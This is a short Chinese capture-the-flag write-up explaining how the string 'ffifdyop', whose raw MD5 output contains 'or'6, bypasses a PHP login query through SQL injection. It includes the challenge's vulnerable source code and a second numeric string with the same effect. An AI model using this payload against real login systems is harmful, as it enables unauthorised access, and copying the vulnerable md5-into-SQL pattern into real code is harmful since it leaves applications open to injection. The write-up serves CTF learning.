ffifdyop——绕过中一个奇妙的字符串
根据师傅们的博客总结如下:
ffifdyop
经过md5加密后:276f722736c95d99e921722cf9ed621c
再转换为字符串:'or'6<乱码> 即 'or'66�]��!r,��b
用途:
select * from admin where password=''or'6<乱码>'
就相当于select * from admin where password=''or 1 实现sql注入
题目:实验吧——md5绕过
链接:http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php
1、查看网页源代码 发现提示
$password=$_POST['password']; $sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'"; $result=mysqli_query($link,$sql); if(mysqli_num_rows($result)>0){ echo 'flag is :'.$flag; } else{ echo '密码错误!'; }
解释一下md5这个函数:md5(string,raw)
md5(string,raw)
参数 | 描述 |
---|---|
string | 必需。规定要计算的字符串。 |
raw |
可选。规定十六进制或二进制输出格式:
|
不光有ffifdyop 还有 129581926211651571912466741651878684928 也可达同样的效果
总之,相当于 select * from admin where password=''or ture
参考博客:https://blog.csdn.net/March97/article/details/81222922